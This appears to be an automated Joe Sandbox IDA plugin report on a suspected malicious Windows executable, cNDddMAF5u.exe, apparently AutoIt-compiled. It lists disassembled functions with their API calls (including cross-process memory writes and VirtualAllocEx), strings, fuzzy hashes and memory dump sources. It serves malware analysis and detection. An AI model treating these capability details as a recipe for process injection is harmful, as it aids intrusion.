Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e08f4d1529d81e02d7a66c827c06db80825e4e41a30f9383474ef1f6ed975e4b
Instruction ID: ce51949de5f6c586960b33109bc773b02f918099bd1aef26c0db31c67c917c94
Opcode Fuzzy Hash: e08f4d1529d81e02d7a66c827c06db80825e4e41a30f9383474ef1f6ed975e4b
Instruction Fuzzy Hash: 7FF03171005288DBE7265F59ED1C7A43F61A700366F44C214F659651F0D73895D2DF28

Function 006D0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 006D10F9
__freea.LIBCMT ref: 006D1117

Part of subcall function 006D1537: _free.LIBCMT ref: 006D154F

Strings

a/p, xrefs: 006D11DE
am/pm, xrefs: 006D117A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 803f110ad71ee28dd634f0b8203996b59bcb45075b2517c51da3c345c8489a36
Instruction ID: c8d8688af5626ee66aff780e38152c2b78fe662c22a4f9a8314d52846b9df4c3
Opcode Fuzzy Hash: 803f110ad71ee28dd634f0b8203996b59bcb45075b2517c51da3c345c8489a36
Instruction Fuzzy Hash: F3D1CD71D00206EADB289F68C855BFAB7B3EF07300F29415BE901AF751D6B59E81CB91

Function 007261D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 006C0242: EnterCriticalSection.KERNEL32(0077070C,00771884,?,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C024D
Part of subcall function 006C0242: LeaveCriticalSection.KERNEL32(0077070C,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C028A

Part of subcall function 006C00A3: __onexit.LIBCMT ref: 006C00A9

__Init_thread_footer.LIBCMT ref: 00726238

Part of subcall function 006C01F8: EnterCriticalSection.KERNEL32(0077070C,?,?,006B8747,00772514), ref: 006C0202
Part of subcall function 006C01F8: LeaveCriticalSection.KERNEL32(0077070C,?,006B8747,00772514), ref: 006C0235

Part of subcall function 0071359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007135E4
Part of subcall function 0071359C: LoadStringW.USER32(00772390,?,00000FFF,?), ref: 0071360A

Strings

x#w, xrefs: 0072633A
x#w, xrefs: 00726353
x#w, xrefs: 0072636F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#w$x#w$x#w
API String ID: 1072379062-1925529421
Opcode ID: f2517a4ae0f52bc3aabab008b957a8c4ced8ec634ad3361c30532ea945188ad4
Instruction ID: 8a339fa1d614bac7939eaeb06e289606699f9bd2775fbcc4252cd9639bcb12f8
Opcode Fuzzy Hash: f2517a4ae0f52bc3aabab008b957a8c4ced8ec634ad3361c30532ea945188ad4
Instruction Fuzzy Hash: 2BC19E71A00115AFCB14EF58D890EBEB7BAFF49310F10806AF9559B291DB74EE51CB90

Function 006D8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 006D8B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 006D8B7A
__dosmaperr.LIBCMT ref: 006D8B81

Strings

.l, xrefs: 006D8A63

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .l
API String ID: 2434981716-3986846653
Opcode ID: 7c7e5fb048af6a11ad2491eab51904019cc891034b097bbacc532f142412fc42
Instruction ID: 7a74dd540b929326fcec394e0aa84d58c31daa39685244a762b0ac2bdb799845
Opcode Fuzzy Hash: 7c7e5fb048af6a11ad2491eab51904019cc891034b097bbacc532f142412fc42
Instruction Fuzzy Hash: 28415CB0E04185AFD7259F68C898ABD7FA7DB85304B2C819BF88587342DE358C029794

Function 00702716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0070B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007021D0,?,?,00000034,00000800,?,00000034), ref: 0070B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00702760

Part of subcall function 0070B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0070B3F8

Part of subcall function 0070B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0070B355
Part of subcall function 0070B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00702194,00000034,?,?,00001004,00000000,00000000), ref: 0070B365
Part of subcall function 0070B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00702194,00000034,?,?,00001004,00000000,00000000), ref: 0070B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007027CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0070281A

Strings

@, xrefs: 00702832

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: d341b315f3a70ddf64c3c30a66a4d88be15c14bfd0aacc435ce4a7939217116e
Instruction ID: 56e8c8a0aa023c20685a75325e92aef8b96279437651cd5518cad5095e7b518e
Opcode Fuzzy Hash: d341b315f3a70ddf64c3c30a66a4d88be15c14bfd0aacc435ce4a7939217116e
Instruction Fuzzy Hash: 67412976900218EFDB10DFA4C946AEEBBB8EB09300F108199FA55B7181DA746F45CBA0

Function 006D172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\cNDddMAF5u.exe,00000104), ref: 006D1769
_free.LIBCMT ref: 006D1834
_free.LIBCMT ref: 006D183E

Strings

C:\Users\user\Desktop\cNDddMAF5u.exe, xrefs: 006D1760, 006D1767, 006D1796, 006D17CE

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\cNDddMAF5u.exe
API String ID: 2506810119-1753390976
Opcode ID: b9c5c4302d198ca1afb89806505c7799ee6253190c24b31b951795b6783fd032
Instruction ID: c3d232846637b2cf7c9fc2f92524bac1fa9342784e0e7dfc06d317facb0cd397
Opcode Fuzzy Hash: b9c5c4302d198ca1afb89806505c7799ee6253190c24b31b951795b6783fd032
Instruction Fuzzy Hash: A8318071E00218BBDB21DB99D885DDEBBFEEB86350B54416BF404DB321D6B08E41DB94

Function 0070C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0070C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0070C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00771990,01655AA8), ref: 0070C395

Strings

0, xrefs: 0070C2DF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: ef222650756722c2f147eb816ef4baa3b6401e9da11f9df8ac5d8c2115448ca3
Instruction ID: e163f0531d40c3ba53535d2f79db46afa1582ff19c672ee26cc1a05a133a3d68
Opcode Fuzzy Hash: ef222650756722c2f147eb816ef4baa3b6401e9da11f9df8ac5d8c2115448ca3
Instruction Fuzzy Hash: 6A418E31204301DFD721DF25D885B5AFBE4AF85320F148B1DF9A5972D2D778A904CB66

Function 00734416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0073CC08,00000000,?,?,?,?), ref: 007344AA
GetWindowLongW.USER32 ref: 007344C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007344D7

Strings

SysTreeView32, xrefs: 0073447C

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 741861332c2f4d04d64ea7bce2f99265fbb76d24030d475a36f79ba2002fad08
Instruction ID: cfc34403f3f6d595c396dcaec67ca3c5c1230e5cb5e3cc5af9bffa61ffc270b7
Opcode Fuzzy Hash: 741861332c2f4d04d64ea7bce2f99265fbb76d24030d475a36f79ba2002fad08
Instruction Fuzzy Hash: 6831B072200245AFEF259E38DC45BDA77A9EB09334F204329F975A21D2D778EC509B50

Function 00706E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00706EED
VariantCopyInd.OLEAUT32(?,?), ref: 00706F08
VariantClear.OLEAUT32(?), ref: 00706F12

Strings

*jp, xrefs: 00706E8B, 00706E90, 00706EF8

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jp
API String ID: 2173805711-93120565
Opcode ID: dc0dd8ba88cf6aff0418fa0e65a592e7c8a3f2a075c5c9efa24fae34eb454ac5
Instruction ID: 5b3c1f2cdea079008f96e768deb8176dc23a8ffb2538e88ff3a70f5686cc1dbf
Opcode Fuzzy Hash: dc0dd8ba88cf6aff0418fa0e65a592e7c8a3f2a075c5c9efa24fae34eb454ac5
Instruction Fuzzy Hash: 51317371604246DFCB05BFA4E8619BD77B6FF45B00B1045ADF9025B2E2CB38AD21DB94

Function 0072304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0072335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00723077,?,?), ref: 00723378

inet_addr.WSOCK32(?), ref: 0072307A
_wcslen.LIBCMT ref: 0072309B
htons.WSOCK32(00000000), ref: 00723106

Strings

255.255.255.255, xrefs: 00723095, 0072309A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: a050ac09e25e6383d33d2fc820a313d1ae1d653728b7dc671bf09e770f50bc08
Instruction ID: db5b3eae0c393ecf382a92312da3f431f7597c4c1563a68dae500d051b3dbb12
Opcode Fuzzy Hash: a050ac09e25e6383d33d2fc820a313d1ae1d653728b7dc671bf09e770f50bc08
Instruction Fuzzy Hash: 4331B0352002259FDB20CF68D486EAA77E1EF15318F248459E9158B392DB7EEF41CB70

Function 00734653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00734705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00734713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0073471A

Strings

msctls_updown32, xrefs: 00734684

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 2caa4e7974324a902149034c69d4e480101339417a285691e3ad28790aa2384a
Instruction ID: d544ebcaaf014f5b08f46947b5a8584efad117a67e55ba6fc5fde4c597980978
Opcode Fuzzy Hash: 2caa4e7974324a902149034c69d4e480101339417a285691e3ad28790aa2384a
Instruction Fuzzy Hash: ED218EB5600208AFEB15DF68DC81DA737ADEB4A3A4B040049FA049B292CB34FC51CB64

Function 007095AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0070961D

Strings

#OnAutoItStartRegister, xrefs: 007095F3
#notrayicon, xrefs: 007095B7
#requireadmin, xrefs: 007095D9

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 350bd5398ca8d696b9d9dcfb5531e00d31329f8a5605977dc30c5efe75447ad0
Instruction ID: 18bd9e387c2948362e2ffc1ff854b1acdd99b7a952284e26b84a9093e1e39678
Opcode Fuzzy Hash: 350bd5398ca8d696b9d9dcfb5531e00d31329f8a5605977dc30c5efe75447ad0
Instruction Fuzzy Hash: B821F6B2104511FAD331BB259C02FB7B3D9DF55310F14412EFA49971C3EB5A9D51C2A9

Function 007337B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00733840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00733850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00733876

Strings

Listbox, xrefs: 0073380F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: d8e5db9608363c864385bfc6c418f5f9c8c7d3f966c9c7db7f65b698b5b52f74
Instruction ID: 42b450c8752c7774a7e41c1436ec190cd53fbeb4fe135ff70589103d21c45eff
Opcode Fuzzy Hash: d8e5db9608363c864385bfc6c418f5f9c8c7d3f966c9c7db7f65b698b5b52f74
Instruction Fuzzy Hash: E021BE72610218BBFB218F54CC85EEB376AEF89760F108124F9049B191C679DC528BA0

Function 007149F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00714A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00714A5C
SetErrorMode.KERNEL32(00000000,?,?,0073CC08), ref: 00714AD0

Strings

%lu, xrefs: 00714A6F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: c5a213d6848a4408f52b376e824fd5b39979ab693d448f3b6b2ab58b5cfbfd29
Instruction ID: cb170029d758d65edacdda948b7ae62ed7a3399b4f28d2a3d1d85fef7df0470b
Opcode Fuzzy Hash: c5a213d6848a4408f52b376e824fd5b39979ab693d448f3b6b2ab58b5cfbfd29
Instruction Fuzzy Hash: ED319375A00108AFD710DF54C885EAA7BF9EF05304F148098F905DB352D775ED45CB61

Function 007341EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0073424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00734264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00734271

Strings

msctls_trackbar32, xrefs: 00734226

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 57405de43975b38806ee998c30c825e9e2143d80186ce07b087349f949837cfd
Instruction ID: aaf957582c7a7f2fe527584eec4b2bd8fae69d44281804eab91ad1e0dad84cf3
Opcode Fuzzy Hash: 57405de43975b38806ee998c30c825e9e2143d80186ce07b087349f949837cfd
Instruction Fuzzy Hash: A611E031240208BEFF209E29CC06FAB3BACEF85B64F010128FA55E20A1D275EC519B24

Function 00702F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

Part of subcall function 00702DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00702DC5
Part of subcall function 00702DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00702DD6
Part of subcall function 00702DA7: GetCurrentThreadId.KERNEL32 ref: 00702DDD
Part of subcall function 00702DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00702DE4

GetFocus.USER32 ref: 00702F78

Part of subcall function 00702DEE: GetParent.USER32(00000000), ref: 00702DF9

GetClassNameW.USER32(?,?,00000100), ref: 00702FC3
EnumChildWindows.USER32(?,0070303B), ref: 00702FEB

Strings

%s%d, xrefs: 00702FFF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: f2d8825d476a3368c2a4428391fefb9a236c50065d71ce948578d0d3a7cf71d0
Instruction ID: f0e49381a26ccbec12e025c07b2a0eeb443600d25fab1587c7d2e22dcd5b6bf3
Opcode Fuzzy Hash: f2d8825d476a3368c2a4428391fefb9a236c50065d71ce948578d0d3a7cf71d0
Instruction Fuzzy Hash: 1211A571700205EBDF557F60CD8AEED77AAAF84304F048179B909AB292DE389D458B70

Function 00735882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007358C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007358EE
DrawMenuBar.USER32(?), ref: 007358FD

Strings

0, xrefs: 0073588F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 71b48c9b3ce7e5e22431bdbc9501ab591b5b5eacbc24c11325ec2c3158883e89
Instruction ID: b180e06f6cbc8bb2d56fdce2555b2d932c1ce83df396fe9c093ebe25a8f30871
Opcode Fuzzy Hash: 71b48c9b3ce7e5e22431bdbc9501ab591b5b5eacbc24c11325ec2c3158883e89
Instruction Fuzzy Hash: D601C072500218EFEB619F11DC44BEEBBB5FF45361F108099E848D6162DB349A90DF31

Function 0070007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

